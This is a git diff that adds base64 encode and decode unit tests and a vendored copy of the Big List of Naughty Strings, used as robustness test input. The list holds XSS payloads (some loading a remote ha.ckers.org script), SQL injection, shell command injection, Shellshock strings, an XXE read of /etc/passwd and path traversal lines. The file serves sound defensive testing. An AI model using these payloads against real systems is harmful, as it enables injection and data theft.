EXPECT_TRUE(base64::base64_decode("Zm8=", output)); + EXPECT_EQ(output, "fo"); + EXPECT_TRUE(base64::base64_decode("Zm9v", output)); + EXPECT_EQ(output, "foo"); + EXPECT_TRUE(base64::base64_decode("Zm9vYg==", output)); + EXPECT_EQ(output, "foob"); + EXPECT_TRUE(base64::base64_decode("Zm9vYmE=", output)); + EXPECT_EQ(output, "fooba"); + EXPECT_TRUE(base64::base64_decode("Zm9vYmFy", output)); + EXPECT_EQ(output, "foobar"); +} + +// Tests using pathalogical cases for all escapings +TEST(Base64, NaugtyStrings){ + std::string base64_string; + std::string decoded_string; + for (auto& str: naughty_strings){ + EXPECT_TRUE(base64::base64_encode(str, base64_string)); + EXPECT_TRUE(base64::base64_decode(base64_string, decoded_string)); + EXPECT_EQ(str, decoded_string); + } +} + diff --git a/src/blns.txt b/src/blns.txt new file mode 100644 index 0000000000..cdbac02377 --- /dev/null +++ b/src/blns.txt @@ -0,0 +1,685 @@ +# sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + +# Reserved Strings +# +# Strings which may be used elsewhere in code + +undefined +undef +null +NULL +(null) +nil +NIL +true +false +True +False +TRUE +FALSE +None +hasOwnProperty +\ +\\ + +# Numeric Strings +# +# Strings which can be interpreted as numeric + +0 +1 +1.00 +$1.00 +1/2 +1E2 +1E02 +1E+02 +-1 +-1.00 +-$1.00 +-1/2 +-1E2 +-1E02 +-1E+02 +1/0 +0/0 +-2147483648/-1 +-9223372036854775808/-1 +-0 +-0.0 ++0 ++0.0 +0.00 +0..0 +. +0.0.0 +0,00 +0,,0 +, +0,0,0 +0.0/0 +1.0/0.0 +0.0/0.0 +1,0/0,0 +0,0/0,0 +--1 +- +-. +-, +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +NaN +Infinity +-Infinity +INF +1#INF +-1#IND +1#QNAN +1#SNAN +1#IND +0x0 +0xffffffff +0xffffffffffffffff +0xabad1dea +123456789012345678901234567890123456789 +1,000.00 +1 000.00 +1'000.00 +1,000,000.00 +1 000 000.00 +1'000'000.00 +1.000,00 +1 000,00 +1'000,00 +1.000.000,00 +1 000 000,00 +1'000'000,00 +01000 +08 +09 +2.2250738585072011e-308 + +# Special Characters +# +# ASCII punctuation. All of these characters may need to be escaped in some +# contexts. Divided into three groups based on (US-layout) keyboard position. + +,./;'[]\-= +<>?:"{}|_+ +!@#$%^&*()`~ + +# Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, +# and U+007F (DEL) +# Often forbidden to appear in various text-based file formats (e.g. XML), +# or reused for internal delimiters on the theory that they should never +# appear in input. +# The next line may appear to be blank or mojibake in some viewers. + + +# Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. +# Commonly misinterpreted as additional graphic characters. +# The next line may appear to be blank, mojibake, or dingbats in some viewers. + + +# Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode +# version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), +# and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often +# treated as whitespace in some contexts. +# This file unfortunately cannot express strings containing +# U+0000, U+000A, or U+000D (NUL, LF, CR). +# The next line may appear to be blank or mojibake in some viewers. +# The next line may be flagged for "trailing whitespace" in some viewers. +
+ +# Unicode additional control characters: all of the characters with +# general category Cf (in Unicode 8.0.0). +# The next line may appear to be blank or mojibake in some viewers. + + +# "Byte order marks", U+FEFF and U+FFFE, each on its own line. +# The next two lines may appear to be blank or mojibake in some viewers. + + + +# Unicode Symbols +# +# Strings which contain common unicode symbols (e.g. smart quotes) + +Ω≈ç√∫˜µ≤≥÷ +åß∂ƒ©˙∆˚¬…æ +œ∑´®†¥¨ˆøπ“‘ +¡™£¢∞§¶•ªº–≠ +¸˛Ç◊ı˜Â¯˘¿ +ÅÍÎÏ˝ÓÔÒÚÆ☃ +Œ„´‰ˇÁ¨ˆØ∏”’ +`⁄€‹›fifl‡°·‚—± +⅛⅜⅝⅞ +ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя +٠١٢٣٤٥٦٧٨٩ + +# Unicode Subscript/Superscript/Accents +# +# Strings which contain unicode subscripts/superscripts; can cause rendering issues + +⁰⁴⁵ +₀₁₂ +⁰⁴⁵₀₁₂ +ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ + +# Quotation Marks +# +# Strings which contain misplaced quotation marks; can cause encoding errors + +' +" +'' +"" +'"' +"''''"'" +"'"'"''''" +<foo val=“bar” /> +<foo val=“bar” /> +<foo val=”bar“ /> +<foo val=`bar' /> + +# Two-Byte Characters +# +# Strings which contain two-byte characters: can cause rendering issues or character-length issues + +田中さんにあげて下さい +パーティーへ行かないか +和製漢語 +部落格 +사회과학원 어학연구소 +찦차를 타고 온 펲시맨과 쑛다리 똠방각하 +社會科學院語學研究所 +울란바토르 +𠜎𠜱𠝹𠱓𠱸𠲖𠳏 + +# Changing length when lowercased +# +# Characters which increase in length (2 to 3 bytes) when lowercased +# Credit: https://twitter.com/jifa/status/625776454479970304 + +Ⱥ +Ⱦ + +# Japanese Emoticons +# +# Strings which consists of Japanese-style emoticons which are popular on the web + +ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ +(。◕ ∀ ◕。) +`ィ(´∀`∩ +__ロ(,_,*) +・( ̄∀ ̄)・:*: +゚・✿ヾ╲(。◕‿◕。)╱✿・゚ +,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ +(╯°□°)╯︵ ┻━┻) +(ノಥ益ಥ)ノ ┻━┻ +┬─┬ノ( º _ ºノ) +( ͡° ͜ʖ ͡°) + +# Emoji +# +# Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + +😍 +👩🏽 +👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 +🐵 🙈 🙉 🙊 +❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 +✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 +🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 +0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 + +# Regional Indicator Symbols +# +# Regional Indicator Symbols can be displayed differently across +# fonts, and have a number of special behaviors + +🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 +🇺🇸🇷🇺🇸🇦🇫🇦🇲 +🇺🇸🇷🇺🇸🇦 + +# Unicode Numbers +# +# Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + +123 +١٢٣ + +# Right-To-Left Strings +# +# Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + +ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. +בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ +הָיְתָהtestالصفحات التّحول +﷽ +ﷺ +مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، + +# Trick Unicode +# +# Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + +test +test +
test
+testtest +test + +# Zalgo Text +# +# Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + +Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ +̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ +̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ +̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ +Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ + +# Unicode Upsidedown +# +# Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) + +˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ +00˙Ɩ$- + +# Unicode font +# +# Strings which contain bold/italic/etc. versions of normal characters + +The quick brown fox jumps over the lazy dog +𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 +𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 +𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 +𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 +𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 +𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 +⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ + +# Script Injection +# +# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + +<script>alert(123)</script> +<script>alert('123');</script> +<img src=x onerror=alert(123) /> +<svg><script>123<1>alert(123)</script> +"><script>alert(123)</script> +'><script>alert(123)</script> +><script>alert(123)</script> +</script><script>alert(123)</script> +< / script >< script >alert(123)< / script > + onfocus=JaVaSCript:alert(123) autofocus +" onfocus=JaVaSCript:alert(123) autofocus +' onfocus=JaVaSCript:alert(123) autofocus +<script>alert(123)</script> +<sc<script>ript>alert(123)</sc</script>ript> +--><script>alert(123)</script> +";alert(123);t=" +';alert(123);t=' +JavaSCript:alert(123) +;alert(123); +src=JaVaSCript:prompt(132) +"><script>alert(123);</script x=" +'><script>alert(123);</script x=' +><script>alert(123);</script x= +" autofocus onkeyup="javascript:alert(123) +' autofocus onkeyup='javascript:alert(123) +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=javascript:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav	ascript:alert('XSS');"> +<IMG SRC="jav
ascript:alert('XSS');"> +<IMG SRC="jav
ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +<u oncopy=alert()> Copy me</u> +<i onwheel=alert(1)> Scroll over me </i> +<plaintext> +http://a/%%30%30 +</textarea><script>alert(123)</script> + +# SQL Injection +# +# Strings which can cause a SQL injection if inputs are not sanitized + +1;DROP TABLE users +1'; DROP TABLE users-- 1 +' OR 1=1 -- 1 +' OR '1'='1 + +% +_ + +# Server Code Injection +# +# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + +- +-- +--version +--help +$USER +/dev/null; touch /tmp/blns.fail ; echo +`touch /tmp/blns.fail` +$(touch /tmp/blns.fail) +@{[system "touch /tmp/blns.fail"]} + +# Command Injection (Ruby) +# +# Strings which can call system commands within Ruby/Rails applications + +eval("puts 'hello world'") +System("ls -al /") +`ls -al /` +Kernel.exec("ls -al /") +Kernel.exit(1) +%x('ls -al /') + +# XXE Injection (XML) +# +# String which can reveal system files when parsed by a badly configured XML parser + +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> + +# Unwanted Interpolation +# +# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. + +$HOME +$ENV{'HOME'} +%d +%s +{0} +%*.*s +File:/// + +# File Inclusion +# +# Strings which can cause user to pull in files that should not be a part of a web server + +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/hosts + +# Known CVEs and Vulnerabilities +# +# Strings that test for known vulnerabilities + +() { 0; }; touch /tmp/blns.shellshock1.fail; +() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } +<<< %s(un='%s') = %u ++++ATH0 + +# MSDOS/Windows Special Filenames +# +# Strings which are reserved characters in MSDOS/Windows + +CON +PRN +AUX +CLOCK$ +NUL +A: +ZZ: +COM1 +LPT1 +LPT2 +LPT3 +COM2 +COM3 +COM4 + +# IRC specific strings +# +# Strings that may occur on IRC clients that make security products freak out + +DCC SEND STARTKEYLOGGER 0 0 0 + +# Scunthorpe Problem +# +# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + +Scunthorpe General Hospital +Penistone Community Church +Lightwater Country Park +Jimmy Clitheroe +Horniman Museum +shitake mushrooms 